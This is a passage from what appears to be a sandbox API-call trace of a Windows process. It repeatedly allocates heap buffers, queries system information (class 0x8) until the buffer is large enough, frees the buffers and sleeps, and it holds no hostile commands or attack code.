returned 0xc0000004 [0291.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0291.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0291.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0291.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0291.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0291.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0291.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0291.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.910] Sleep (dwMilliseconds=0x110) [0291.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0291.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0291.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0291.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0291.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0291.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0291.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0291.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0291.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.928] Sleep (dwMilliseconds=0x110) [0291.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0291.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0291.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0291.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0291.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0291.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0291.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0291.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0291.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.942] Sleep (dwMilliseconds=0x110) [0291.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0291.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0291.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0291.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0291.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0291.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0291.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0291.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0291.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.956] Sleep (dwMilliseconds=0x110) [0291.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0291.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0291.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0291.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0291.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0291.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0291.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0291.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0291.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.970] Sleep (dwMilliseconds=0x110) [0291.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0291.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0291.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0291.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0291.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0291.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0291.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0291.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0291.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.989] Sleep (dwMilliseconds=0x110) [0292.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0292.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0292.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0292.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0292.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0292.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0292.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.053] Sleep (dwMilliseconds=0x110) [0292.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0292.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0292.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0292.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0292.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0292.071] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0292.071] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.072] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.072] Sleep (dwMilliseconds=0x110) [0292.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0292.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0292.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0292.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0292.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0292.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0292.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0292.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0292.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.082] Sleep (dwMilliseconds=0x110) [0292.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0292.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0292.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0292.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0292.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0292.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0292.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.095] Sleep (dwMilliseconds=0x110) [0292.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0292.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0292.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0292.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0292.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0292.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0292.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0292.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0292.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.110] Sleep (dwMilliseconds=0x110) [0292.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0292.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0292.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0292.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0292.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0292.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0292.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0292.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0292.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.128] Sleep (dwMilliseconds=0x110) [0292.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0292.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0292.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0292.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0292.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0292.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0292.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0292.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0292.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.142] Sleep (dwMilliseconds=0x110) [0292.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0292.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0292.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0292.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0292.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0292.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0292.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0292.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0292.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0292.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0292.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0292.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0292.163] Sleep (dwMilliseconds=0x110) [0292.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0292.170] 